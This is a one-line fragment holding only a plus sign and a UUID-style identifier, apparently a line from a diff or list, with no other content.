+c01cad7f-7a4c-49df-985e-b190dcf6a279